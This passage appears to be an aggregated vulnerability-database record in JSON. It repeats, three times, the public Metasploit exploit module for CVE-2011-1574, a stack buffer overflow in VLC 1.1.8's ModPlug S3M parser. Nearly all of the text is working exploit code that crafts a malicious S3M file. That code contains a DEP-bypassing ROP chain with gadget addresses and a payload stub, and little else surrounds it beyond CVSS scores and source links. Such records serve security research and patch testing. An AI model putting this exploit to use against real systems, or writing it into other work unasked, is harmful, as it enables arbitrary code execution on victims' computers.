/ ret' => 0x7d64,\r\n\t\t}\r\n\tend\r\n\r\n\tdef generate_rop(rvas)\r\n\t\t# ROP fun! 
(XP SP3 English, Apr 10 2011)\r\n\t\trvas.merge!({\r\n\t\t\t# Instructions / Name => RVA\r\n\t\t\t'BaseAddress' => 0x653c0000,\r\n\t\t\t'imp_VirtualProtect' => 0xec2f0 - 0x1c, # adjust for gadget used to resolve\r\n\t\t\t'imp_Sleep' => 0xec2dc,\r\n\t\t\t'Scratch' => 0x5fbfc,\r\n\t\t\t'Data' => 0x60101,\r\n\t\t\t#'DataAdjusted' => 0x60000 - 0x58 + 0x8,\r\n\t\t\t'DataAdjusted' => 0x60000 - 0x58,\r\n\t\t})\r\n\r\n\t\tcopy_stage = <<-EOS\r\n\tnop\r\n\tpush esp\r\n\tpop esi\r\n\tlea edi, [eax+0x10]\r\n\tpush 0x7f\r\n\tpop ecx\r\n\tinc ecx\r\n\trep movsd\r\nEOS\r\n\t\tcopy_stage = Metasm::Shellcode.assemble(Metasm::Ia32.new, copy_stage).encode_string\r\n\t\tif (copy_stage.length % 4) > 0\r\n\t\t\traise RuntimeError, \"The copy stage is invalid\"\r\n\t\tend\r\n\r\n\t\trop_stack = [\r\n\t\t\t# Resolve VirtualProtect\r\n\t\t\t'pop eax / ret',\r\n\t\t\t'imp_VirtualProtect',\r\n\t\t\t'mov eax, [eax+0x1c] / ret',\r\n\r\n\t\t\t# Call VirtuaProtect\r\n\t\t\t'push eax / ret',\r\n\t\t\t'pop eax / ret', # after VirtualProtect\r\n\t\t\t# Args to VirtualProtect\r\n\t\t\t'Data', # lpAddress (place holder, filled in @ runtime above)\r\n\t\t\t0x1000, # dwSize\r\n\t\t\t0x40, # flNewProtect\r\n\t\t\t'Scratch', # lpflOldProtect\r\n\r\n\t\t\t# Load the pre-adjusted Data addr\r\n\t\t\t'DataAdjusted', # matches pop eax / ret above\r\n\r\n\t\t\t##\r\n\t\t\t# Write our code little stager to our newly executable memory.\r\n\t\t\t##\r\n\r\n\t\t\t# Load the last 32-bits of code to write\r\n\t\t\t'pop ebx / pop ebp / ret',\r\n\t\t\tcopy_stage[0, 4].unpack('V').first,\r\n\t\t\t:unused, # ebp\r\n\r\n\t\t\t# Write & advance\r\n\t\t\t'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / ret',\r\n\t\t\tcopy_stage[4, 4].unpack('V').first,\r\n\t\t\t:unused, # esi\r\n\t\t\t:unused, # edi\r\n\t\t\t:unused, # ebp\r\n\t\t\t'add eax, 4 / pop ebp / ret',\r\n\t\t\t:unused, # ebp\r\n\r\n\t\t\t# Write & advance\r\n\t\t\t'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / 
ret',\r\n\t\t\tcopy_stage[8, 4].unpack('V').first,\r\n\t\t\t:unused, # esi\r\n\t\t\t:unused, # edi\r\n\t\t\t:unused, # ebp\r\n\t\t\t'add eax, 4 / pop ebp / ret',\r\n\t\t\t:unused, # ebp\r\n\r\n\t\t\t# Write & advance\r\n\t\t\t'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / ret',\r\n\t\t\t0xffffffb0, # adjustment value\r\n\t\t\t:unused, # esi\r\n\t\t\t:unused, # edi\r\n\t\t\t:unused, # ebp\r\n\r\n\t\t\t# Adjust eax\r\n\t\t\t'sub eax, ebx / pop ebx / pop edi / pop ebp / ret',\r\n\t\t\t:unused, # ebx\r\n\t\t\t:unused, # edi\r\n\t\t\t:unused, # ebp\r\n\r\n\t\t\t# Execute the copy stage\r\n\t\t\t'push eax / ret',\r\n\t\t]\r\n\r\n\t\trop_stack.map! { |e|\r\n\t\t\tif e.kind_of? String\r\n\t\t\t\t# Meta-replace (RVA)\r\n\t\t\t\traise RuntimeError, \"Unable to locate key: \\\"#{e}\\\"\" if not rvas[e]\r\n\t\t\t\trvas['BaseAddress'] + rvas[e]\r\n\r\n\t\t\telsif e == :unused\r\n\t\t\t\t# Randomize\r\n\t\t\t\trand_text(4).unpack('V').first\r\n\r\n\t\t\telse\r\n\t\t\t\t# Literal\r\n\t\t\t\te\r\n\t\t\tend\r\n\t\t}\r\n\r\n\t\trop_stack.pack('V*')\r\n\tend\r\n\r\n\tdef rva2addr(rvas, key)\r\n\t\traise RuntimeError, \"Unable to locate key: \\\"#{key}\\\"\" if not rvas[key]\r\n\t\trvas['BaseAddress'] + rvas[key]\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/17252/"}], "packetstorm": [{"lastseen": "2016-12-05T22:13:11", "description": "", "published": "2011-05-09T00:00:00", "type": "packetstorm", "title": "VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1574"], "modified": "2011-05-09T00:00:00", "id": "PACKETSTORM:101216", "href": "https://packetstormsecurity.com/files/101216/VideoLAN-VLC-ModPlug-ReadS3M-Stack-Buffer-Overflow.html", "sourceData": "`## \n# $Id: vlc_modplug_s3m.rb 12282 2011-04-08 15:48:53Z jduck $ \n## \n \n## \n# This file is part of the Metasploit Framework and may be 
subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \nRank = AverageRanking \n \ninclude Msf::Exploit::FILEFORMAT \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow', \n'Description' => %q{ \nThis module exploits an input validation error in libmod_plugin as \nincluded with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9 \nare affected. By creating a malicious S3M file, a remote attacker \ncould execute arbitrary code. \n \nAlthough other products that bundle libmodplug may be vulnerable, this \nmodule was only tested against VLC. \n \nNOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to \npermanently enable NX support on machines that support it. As such, \nthis module is capable of bypassing DEP, but not ASLR. 
\n}, \n'License' => MSF_LICENSE, \n'Author' => [ 'jduck' ], \n'Version' => '$Revision: 12282 $', \n'References' => \n[ \n[ 'CVE', '2011-1574' ], \n[ 'OSVDB', '72143' ], \n#[ 'BID', 'xxx' ], \n[ 'URL', 'http://modplug-xmms.git.sourceforge.net/git/gitweb.cgi?p=modplug-xmms/modplug-xmms;a=commitdiff;h=aecef259828a89bb00c2e6f78e89de7363b2237b' ], \n[ 'URL', 'http://hackipedia.org/File%20formats/Music/html/s3mformat.php' ], \n[ 'URL', 'https://www.sec-consult.com/files/20110407-0_libmodplug_stackoverflow.txt' ], \n[ 'URL', 'http://seclists.org/fulldisclosure/2011/Apr/113' ] \n], \n'Payload' => \n{ \n'Space' => 512 - 0x24, # Space reserved for prepended mutex code \n#'DisableNops' => true, \n}, \n'Platform' => 'win', \n'Targets' => \n[ \n[ 'VLC 1.1.8 on Windows XP SP3', \n{ \n# vuln is in libmod_plugin.dll, rop is custom to this module \n} \n], \n], \n'Privileged' => false, \n'DisclosureDate' => 'Apr 07, 2011', # \"found: 2011-03-09\" \n'DefaultTarget' => 0)) \n \nregister_options( \n[ \nOptString.new('FILENAME', [ true, 'The file name.', 'msf.s3m']), \n], self.class) \nend \n \ndef exploit \n \nnum_orders = 0x14 \nnum_instru = 0x15 \nnum_patterns = 0x18 \n \nhdr = \"\\x00\" * 0x1c # song name (none) \nhdr << [ \n0x1a, # static byte \n0x10, # ST3 module \n0x00, # padding \nnum_orders, \nnum_instru, \nnum_patterns, \n0x00, # Flags \n0x1320, # Created with (which tracker) \n0x02, # File format information \n].pack('CCvvvvvvv') \nhdr << \"SCRM\" \n \nhdr << [ \n0x40, # global volume \n0x06, # initial speed \n0x8a, # initial tempo \n0xb0, # master volume \n0x10, # ultra click removal \n0xfb # NOTE, non-0xfc value skips an additional loop! 
\n# 0xfc == default channel pan positions present \n].pack('CCCCCC') \nhdr << \"\\x00\" * 10 # includes pad and special pointer \n \n# channel settings (for 32 channels) \nhdr << \"\\x00\\x08\\x01\\x09\\x02\\x0a\\x03\\x0b\\x04\\x0c\\x05\\x0d\\x06\\x0e\\x07\\x0f\" \nhdr << \"\\xff\" * 16 \n \n# orders \nhdr << \"\\x07\\x08\\x0c\\x09\\x0a\\x0b\\x0b\\x0d\\x0e\\x0f\\x0f\\x0f\\x10\\x11\\x12\\x13\" \nhdr << \"\\x14\\x16\\x17\\xff\" \n \n# parapointers to instruments \nhdr << [ 0x0f ].pack('v') * num_instru \n \n# parapoitners to patterns \nhdr << [ 0x78 ].pack('v') * num_patterns \n \n# channel default pan positions \nhdr << \"\\x00\" * 32 \n \n# instruments \ninstru = \"\\x01metasplo.ity\" \nrest = \"\\x00\" * ((0x50 * num_instru) - instru.length) \n \n# Build the rop stack \nrvas = rvas_libmod_plugin_xpsp3() \nrop = generate_rop(rvas) \nzero_ptr = rva2addr(rvas, 'Scratch') + 4 \nmutex_addr = rva2addr(rvas, 'Scratch') + 8 \nimp_Sleep = rva2addr(rvas, 'imp_Sleep') \n \n# A mutex to prevent double payloads \nlocking_code = <<-EOS \nmov ebx, [ #{imp_Sleep} ] \njmp test_lock \n \nsleep: \npush 0xdeadbeef \ncall ebx \n \ntest_lock: \nmov eax, [ #{mutex_addr} ] \ntest eax,eax \njnz sleep \n \nlock cmpxchg [ #{mutex_addr} ], ebp \ntest eax,eax \njnz sleep \n \nEOS \nrop << Metasm::Shellcode.assemble(Metasm::Ia32.new, locking_code).encode_string \nrop << payload.encoded \n \n# This becomes the new EIP (after return) \nret = rva2addr(rvas, 'pop eax / ret') \nrest[1267, 4] = [ ret ].pack('V') \n \n# In order to force return, we smash the this ptr on the stack and point \n# it so that m_nChannels turns out to be 0. 
\nrest[1271, 4] = [ zero_ptr - 0xe910 ].pack('V') \n \n# Add the ROP stack and final payload here \nrest[1275, rop.length] = rop \ninstru << rest \n \n# patterns \npatt = [ 0x10 ].pack('v') \npatt << \"\\x00\" * 0x10 \n \n \n# finalize the file \ns3m = \"\" \ns3m << hdr \n \ninstru_pad = (0x0f * 0x10) - hdr.length \ns3m << \"\\x80\" * instru_pad \ns3m << instru \n \n \n# patch in exploit trigger values \ns3m[0x22, 2] = [ 0x220 ].pack('v') \ns3m[0x24, 2] = [ 0x220 ].pack('v') \n \n \nprint_status(\"Creating '#{datastore['FILENAME']}' file ...\") \n \nfile_create(s3m) \n \nend \n \ndef rvas_libmod_plugin_xpsp3() \n# libmod_plugin.dll from VLC 1.1.8 (Win32) \n# Just return this hash \n{ \n# Used as 'Ret' for target \n'ret' => 0x1022, \n'push eax / ret' => 0x1cc4d, \n'pop eax / ret' => 0x598a2, \n'mov eax, [eax+0x1c] / ret' => 0x542c9, \n'pop ebx / pop ebp / ret' => 0x25e2f, \n'add eax, 4 / pop ebp / ret' => 0x7028, \n'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / ret' => 0x23dad, \n'sub eax, ebx / pop ebx / pop edi / pop ebp / ret' => 0x7d64, \n} \nend \n \ndef generate_rop(rvas) \n# ROP fun! 
(XP SP3 English, Apr 10 2011) \nrvas.merge!({ \n# Instructions / Name => RVA \n'BaseAddress' => 0x653c0000, \n'imp_VirtualProtect' => 0xec2f0 - 0x1c, # adjust for gadget used to resolve \n'imp_Sleep' => 0xec2dc, \n'Scratch' => 0x5fbfc, \n'Data' => 0x60101, \n#'DataAdjusted' => 0x60000 - 0x58 + 0x8, \n'DataAdjusted' => 0x60000 - 0x58, \n}) \n \ncopy_stage = <<-EOS \nnop \npush esp \npop esi \nlea edi, [eax+0x10] \npush 0x7f \npop ecx \ninc ecx \nrep movsd \nEOS \ncopy_stage = Metasm::Shellcode.assemble(Metasm::Ia32.new, copy_stage).encode_string \nif (copy_stage.length % 4) > 0 \nraise RuntimeError, \"The copy stage is invalid\" \nend \n \nrop_stack = [ \n# Resolve VirtualProtect \n'pop eax / ret', \n'imp_VirtualProtect', \n'mov eax, [eax+0x1c] / ret', \n \n# Call VirtuaProtect \n'push eax / ret', \n'pop eax / ret', # after VirtualProtect \n# Args to VirtualProtect \n'Data', # lpAddress (place holder, filled in @ runtime above) \n0x1000, # dwSize \n0x40, # flNewProtect \n'Scratch', # lpflOldProtect \n \n# Load the pre-adjusted Data addr \n'DataAdjusted', # matches pop eax / ret above \n \n## \n# Write our code little stager to our newly executable memory. 
\n## \n \n# Load the last 32-bits of code to write \n'pop ebx / pop ebp / ret', \ncopy_stage[0, 4].unpack('V').first, \n:unused, # ebp \n \n# Write & advance \n'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / ret', \ncopy_stage[4, 4].unpack('V').first, \n:unused, # esi \n:unused, # edi \n:unused, # ebp \n'add eax, 4 / pop ebp / ret', \n:unused, # ebp \n \n# Write & advance \n'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / ret', \ncopy_stage[8, 4].unpack('V').first, \n:unused, # esi \n:unused, # edi \n:unused, # ebp \n'add eax, 4 / pop ebp / ret', \n:unused, # ebp \n \n# Write & advance \n'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / ret', \n0xffffffb0, # adjustment value \n:unused, # esi \n:unused, # edi \n:unused, # ebp \n \n# Adjust eax \n'sub eax, ebx / pop ebx / pop edi / pop ebp / ret', \n:unused, # ebx \n:unused, # edi \n:unused, # ebp \n \n# Execute the copy stage \n'push eax / ret', \n] \n \nrop_stack.map! { |e| \nif e.kind_of? String \n# Meta-replace (RVA) \nraise RuntimeError, \"Unable to locate key: \\\"#{e}\\\"\" if not rvas[e] \nrvas['BaseAddress'] + rvas[e] \n \nelsif e == :unused \n# Randomize \nrand_text(4).unpack('V').first \n \nelse \n# Literal \ne \nend \n} \n \nrop_stack.pack('V*') \nend \n \ndef rva2addr(rvas, key) \nraise RuntimeError, \"Unable to locate key: \\\"#{key}\\\"\" if not rvas[key] \nrvas['BaseAddress'] + rvas[key] \nend \n \nend \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/101216/vlc_modplug_s3m.rb.txt"}], "metasploit": [{"lastseen": "2020-08-12T19:58:13", "description": "This module exploits an input validation error in libmod_plugin as included with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9 are affected. By creating a malicious S3M file, a remote attacker could execute arbitrary code. 
Although other products that bundle libmodplug may be vulnerable, this module was only tested against VLC. NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to permanently enable NX support on machines that support it. As such, this module is capable of bypassing DEP, but not ASLR.\n", "published": "2011-05-06T15:29:07", "type": "metasploit", "title": "VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-1574"], "modified": "2020-02-26T14:56:08", "id": "MSF:EXPLOIT/WINDOWS/FILEFORMAT/VLC_MODPLUG_S3M", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = AverageRanking\n\n include Msf::Exploit::FILEFORMAT\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'VideoLAN VLC ModPlug ReadS3M Stack Buffer Overflow',\n 'Description' => %q{\n This module exploits an input validation error in libmod_plugin as\n included with VideoLAN VLC 1.1.8. All versions prior to version 1.1.9\n are affected. By creating a malicious S3M file, a remote attacker\n could execute arbitrary code.\n\n Although other products that bundle libmodplug may be vulnerable, this\n module was only tested against VLC.\n\n NOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to\n permanently enable NX support on machines that support it. 
As such,\n this module is capable of bypassing DEP, but not ASLR.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'jduck' ],\n 'References' =>\n [\n [ 'CVE', '2011-1574' ],\n [ 'OSVDB', '72143' ],\n [ 'URL', 'http://modplug-xmms.git.sourceforge.net/git/gitweb.cgi?p=modplug-xmms/modplug-xmms;a=commitdiff;h=aecef259828a89bb00c2e6f78e89de7363b2237b' ],\n [ 'URL', 'https://seclists.org/fulldisclosure/2011/Apr/113' ]\n ],\n 'Payload' =>\n {\n 'Space'\t\t=> 512 - 0x24, # Space reserved for prepended mutex code\n #'DisableNops'\t=> true,\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'VLC 1.1.8 on Windows XP SP3',\n {\n # vuln is in libmod_plugin.dll, rop is custom to this module\n }\n ],\n ],\n 'Privileged' => false,\n 'DisclosureDate' => 'Apr 07 2011', # \"found: 2011-03-09\"\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('FILENAME', [ true, 'The file name.', 'msf.s3m']),\n ])\n end\n\n def exploit\n\n num_orders = 0x14\n num_instru = 0x15\n num_patterns = 0x18\n\n hdr = \"\\x00\" * 0x1c # song name (none)\n hdr << [\n 0x1a, # static byte\n 0x10, # ST3 module\n 0x00, # padding\n num_orders,\n num_instru,\n num_patterns,\n 0x00, # Flags\n 0x1320, # Created with (which tracker)\n 0x02, # File format information\n ].pack('CCvvvvvvv')\n hdr << \"SCRM\"\n\n hdr << [\n 0x40, # global volume\n 0x06, # initial speed\n 0x8a, # initial tempo\n 0xb0, # master volume\n 0x10, # ultra click removal\n 0xfb # NOTE, non-0xfc value skips an additional loop!\n # 0xfc == default channel pan positions present\n ].pack('CCCCCC')\n hdr << \"\\x00\" * 10 # includes pad and special pointer\n\n # channel settings (for 32 channels)\n hdr << \"\\x00\\x08\\x01\\x09\\x02\\x0a\\x03\\x0b\\x04\\x0c\\x05\\x0d\\x06\\x0e\\x07\\x0f\"\n hdr << \"\\xff\" * 16\n\n # orders\n hdr << \"\\x07\\x08\\x0c\\x09\\x0a\\x0b\\x0b\\x0d\\x0e\\x0f\\x0f\\x0f\\x10\\x11\\x12\\x13\"\n hdr << \"\\x14\\x16\\x17\\xff\"\n\n # parapointers to instruments\n hdr << [ 0x0f ].pack('v') * num_instru\n\n # 
parapoitners to patterns\n hdr << [ 0x78 ].pack('v') * num_patterns\n\n # channel default pan positions\n hdr << \"\\x00\" * 32\n\n # instruments\n instru = \"\\x01metasplo.ity\"\n rest = \"\\x00\" * ((0x50 * num_instru) - instru.length)\n\n # Build the rop stack\n rvas = rvas_libmod_plugin_xpsp3()\n rop = generate_rop(rvas)\n zero_ptr = rva2addr(rvas, 'Scratch') + 4\n mutex_addr = rva2addr(rvas, 'Scratch') + 8\n imp_Sleep = rva2addr(rvas, 'imp_Sleep')\n\n # A mutex to prevent double payloads\n locking_code = <<-EOS\n mov ebx, [ #{imp_Sleep} ]\n jmp test_lock\n\nsleep:\n push 0xdeadbeef\n call ebx\n\ntest_lock:\n mov eax, [ #{mutex_addr} ]\n test eax,eax\n jnz sleep\n\n lock cmpxchg [ #{mutex_addr} ], ebp\n test eax,eax\n jnz sleep\n\nEOS\n rop << Metasm::Shellcode.assemble(Metasm::Ia32.new, locking_code).encode_string\n rop << payload.encoded\n\n # This becomes the new EIP (after return)\n ret = rva2addr(rvas, 'pop eax / ret')\n rest[1267, 4] = [ ret ].pack('V')\n\n # In order to force return, we smash the this ptr on the stack and point\n # it so that m_nChannels turns out to be 0.\n rest[1271, 4] = [ zero_ptr - 0xe910 ].pack('V')\n\n # Add the ROP stack and final payload here\n rest[1275, rop.length] = rop\n instru << rest\n\n # patterns\n patt = [ 0x10 ].pack('v')\n patt << \"\\x00\" * 0x10\n\n\n # finalize the file\n s3m = \"\"\n s3m << hdr\n\n instru_pad = (0x0f * 0x10) - hdr.length\n s3m << \"\\x80\" * instru_pad\n s3m << instru\n\n\n # patch in exploit trigger values\n s3m[0x22, 2] = [ 0x220 ].pack('v')\n s3m[0x24, 2] = [ 0x220 ].pack('v')\n\n\n print_status(\"Creating '#{datastore['FILENAME']}' file ...\")\n\n file_create(s3m)\n\n end\n\n def rvas_libmod_plugin_xpsp3()\n # libmod_plugin.dll from VLC 1.1.8 (Win32)\n # Just return this hash\n {\n # Used as 'Ret' for target\n 'ret' => 0x1022,\n 'push eax / ret' => 0x1cc4d,\n 'pop eax / ret' => 0x598a2,\n 'mov eax, [eax+0x1c] / ret' => 0x542c9,\n 'pop ebx / pop ebp / ret' => 0x25e2f,\n 'add eax, 4 / pop ebp / 
ret' => 0x7028,\n 'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / ret' => 0x23dad,\n 'sub eax, ebx / pop ebx / pop edi / pop ebp / ret' => 0x7d64,\n }\n end\n\n def generate_rop(rvas)\n # ROP fun! (XP SP3 English, Apr 10 2011)\n rvas.merge!({\n # Instructions / Name => RVA\n 'BaseAddress' => 0x653c0000,\n 'imp_VirtualProtect' => 0xec2f0 - 0x1c, # adjust for gadget used to resolve\n 'imp_Sleep' => 0xec2dc,\n 'Scratch' => 0x5fbfc,\n 'Data' => 0x60101,\n #'DataAdjusted' => 0x60000 - 0x58 + 0x8,\n 'DataAdjusted' => 0x60000 - 0x58,\n })\n\n copy_stage = <<-EOS\n nop\n push esp\n pop esi\n lea edi, [eax+0x10]\n push 0x7f\n pop ecx\n inc ecx\n rep movsd\nEOS\n copy_stage = Metasm::Shellcode.assemble(Metasm::Ia32.new, copy_stage).encode_string\n if (copy_stage.length % 4) > 0\n fail_with(Failure::Unknown, \"The copy stage is invalid\")\n end\n\n rop_stack = [\n # Resolve VirtualProtect\n 'pop eax / ret',\n 'imp_VirtualProtect',\n 'mov eax, [eax+0x1c] / ret',\n\n # Call VirtuaProtect\n 'push eax / ret',\n 'pop eax / ret', # after VirtualProtect\n # Args to VirtualProtect\n 'Data', # lpAddress (place holder, filled in @ runtime above)\n 0x1000, # dwSize\n 0x40, # flNewProtect\n 'Scratch', # lpflOldProtect\n\n # Load the pre-adjusted Data addr\n 'DataAdjusted', # matches pop eax / ret above\n\n ##\n # Write our code little stager to our newly executable memory.\n ##\n\n # Load the last 32-bits of code to write\n 'pop ebx / pop ebp / ret',\n copy_stage[0, 4].unpack('V').first,\n :unused, # ebp\n\n # Write & advance\n 'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / ret',\n copy_stage[4, 4].unpack('V').first,\n :unused, # esi\n :unused, # edi\n :unused, # ebp\n 'add eax, 4 / pop ebp / ret',\n :unused, # ebp\n\n # Write & advance\n 'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / ret',\n copy_stage[8, 4].unpack('V').first,\n :unused, # esi\n :unused, # edi\n :unused, # ebp\n 'add eax, 4 / pop ebp / ret',\n :unused, # ebp\n\n # Write & 
advance\n 'mov [eax+0x58], ebx / pop ebx / pop esi / pop edi / pop ebp / ret',\n 0xffffffb0, # adjustment value\n :unused, # esi\n :unused, # edi\n :unused, # ebp\n\n # Adjust eax\n 'sub eax, ebx / pop ebx / pop edi / pop ebp / ret',\n :unused, # ebx\n :unused, # edi\n :unused, # ebp\n\n # Execute the copy stage\n 'push eax / ret',\n ]\n\n rop_stack.map! { |e|\n if e.kind_of? String\n # Meta-replace (RVA)\n fail_with(Failure::Unknown, \"Unable to locate key: \\\"#{e}\\\"\") if not rvas[e]\n rvas['BaseAddress'] + rvas[e]\n\n elsif e == :unused\n # Randomize\n rand_text(4).unpack('V').first\n\n else\n # Literal\n e\n end\n }\n\n rop_stack.pack('V*')\n end\n\n def rva2addr(rvas, key)\n fail_with(Failure::Unknown, \"Unable to locate key: \\\"#{key}\\\"\") if not rvas[key]\n rvas['BaseAddress'] + rvas[key]\n end\nend\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/fileformat/vlc_modplug_s3m.rb"}]}